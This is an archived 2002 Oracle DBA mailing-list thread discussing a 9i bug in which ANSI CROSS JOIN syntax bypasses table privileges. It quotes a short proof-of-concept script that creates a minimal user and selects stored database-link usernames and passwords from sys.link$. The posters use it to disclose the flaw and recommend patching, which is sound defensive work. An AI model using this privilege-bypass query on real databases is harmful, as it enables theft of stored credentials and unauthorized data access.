No , the user did not have access to link$. But that's the point. The bug allows the user access to table he/she doesn't have access to when used with a cross join.
> -----Original Message----- > From: Hately Mike [mailto:[EMAIL PROTECTED]] > Sent: Tuesday, April 16, 2002 11:39 AM > To: Multiple recipients of list ORACLE-L > Subject: RE: Security Hole > > > Glenn, > did the user have access to LINK$. It's common practice to > restrict access > to that table. > > Cheers, > Mike > > -----Original Message----- > Sent: Tuesday, April 16, 2002 3:39 PM > To: Multiple recipients of list ORACLE-L > > > It appeared in 9i and is fixed in 9.2. > 8i is not affected as it does not have cross joins. > > From Metalink Note 137286.1; > > Oracle9i introduces the following SQL:1999-compliant joins: > > 1.1 CROSS Join > 1.2 NATURAL Join > 1.3 OUTER Join > 1.3.1 LEFT OUTER Join > 1.3.2 RIGHT OUTER Join > 1.3.3 FULL OUTER Join > > > 1.1 CROSS Join > -------------- > > A CROSS join is the cross-product of two tables. It is the > equivalent of a > Cartesian product. > ----------------------- > > I tried the query with a cartesian product in 8i and it didn't work. > > select userid,password from sys.link$, dual > * > ERROR at line 1: > ORA-00942: table or view does not exist > > > > -----Original Message----- > > From: Ruth Gramolini [mailto:[EMAIL PROTECTED]] > > Sent: Tuesday, April 16, 2002 8:38 AM > > To: Multiple recipients of list ORACLE-L > > Subject: Re: Security Hole > > > > > > Is this on 9i databases or is 8 involved? Ruth > > ----- Original Message ----- > > To: "Multiple recipients of list ORACLE-L" <[EMAIL PROTECTED]> > > Sent: Tuesday, April 16, 2002 7:33 AM > > > > > > > This just in from comp.databases.oracle.server. > > > > > > See metalink bug 2121935. > > > > > > Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc) > > > allows you to view data from tables on which you have no > > > privilege. For example, try this COMPLETE script: > > > > > > connect / as sysdba > > > create user us1 identified by us1; > > > grant create session to us1; > > > > > > connect us1/us1 > > > > > > select userid, password > > > from > > > sys.link$ cross join dual > > > ; > > > > > > > > > > > > Worse still, if you have the privilege to create views > > > then this loophole allows you to seek and destroy > > > ANY DATA in the database that you might want to. > > > > > > The bug is fixed in 9iR2. I didn't see any note > > > about a backport, or a security alert on OTN. > > > > > > Conclusion: > > > > > > 9.0.1 should not be in use on production system > > > until Oracle supplies a fix. > > > > > > > > > > > > Jonathan Lewis > > > http://www.jlcomp.demon.co.uk > > > > > > Author of: > > > Practical Oracle 8i: Building Efficient Databases > > > > > > Next Seminar - Australia - July/August > > > http://www.jlcomp.demon.co.uk/seminar.html > > > > > > Host to The Co-Operative Oracle Users' FAQ > > > http://www.jlcomp.demon.co.uk/faq/ind_faq.html > > > > > > > > > > > > > > > -- > > > Please see the official ORACLE-L FAQ: http://www.orafaq.com > > > -- > > > Author: Jonathan Lewis > > > INET: [EMAIL PROTECTED] > > > > > > Fat City Network Services -- (858) 538-5051 FAX: > (858) 538-5051 > > > San Diego, California -- Public Internet access / > > Mailing Lists > > > > -------------------------------------------------------------------- > > > To REMOVE yourself from this mailing list, send an E-Mail message > > > to: [EMAIL PROTECTED] (note EXACT spelling of > 'ListGuru') and in > > > the message BODY, include a line containing: UNSUB ORACLE-L > > > (or the name of mailing list you want to be removed > from). You may > > > also send the HELP command for other information (like > subscribing). > > > > -- > > Please see the official ORACLE-L FAQ: http://www.orafaq.com > > -- > > Author: Ruth Gramolini > > INET: [EMAIL PROTECTED] > > > > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 > > San Diego, California -- Public Internet access / > Mailing Lists > > -------------------------------------------------------------------- > > To REMOVE yourself from this mailing list, send an E-Mail message > > to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in > > the message BODY, include a line containing: UNSUB ORACLE-L > > (or the name of mailing list you want to be removed from). You may > > also send the HELP command for other information (like subscribing). > > > -- > Please see the official ORACLE-L FAQ: http://www.orafaq.com > -- > Author: Glenn Travis > INET: [EMAIL PROTECTED] > > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 > San Diego, California -- Public Internet access / Mailing Lists > -------------------------------------------------------------------- > To REMOVE yourself from this mailing list, send an E-Mail message > to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in > the message BODY, include a line containing: UNSUB ORACLE-L > (or the name of mailing list you want to be removed from). You may > also send the HELP command for other information (like subscribing). > > > > ______________________________________________________________ > ______________ > ________________________ > > This email and any attached to it are confidential and > intended only for the > individual or > entity to which it is addressed. If you are not the intended > recipient, > please let us know > by telephoning or emailing the sender. You should also > delete the email and > any attachment > from your systems and should not copy the email or any attachment or > disclose their content > to any other person or entity. The views expressed here are > not necessarily > those of > Churchill Insurance Group plc or its affiliates or > subsidiaries. Thank you. > Churchill Insurance Group plc. Company Registration Number - 2280426. > England. > Registered Office: Churchill Court, Westmoreland Road, > Bromley, Kent BR1 > 1DP. > > > -- > Please see the official ORACLE-L FAQ: http://www.orafaq.com > -- > Author: Hately Mike > INET: [EMAIL PROTECTED] > > Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 > San Diego, California -- Public Internet access / Mailing Lists > -------------------------------------------------------------------- > To REMOVE yourself from this mailing list, send an E-Mail message > to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in > the message BODY, include a line containing: UNSUB ORACLE-L > (or the name of mailing list you want to be removed from). You may > also send the HELP command for other information (like subscribing). > -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Glenn Travis INET: [EMAIL PROTECTED] Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: [EMAIL PROTECTED] (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).
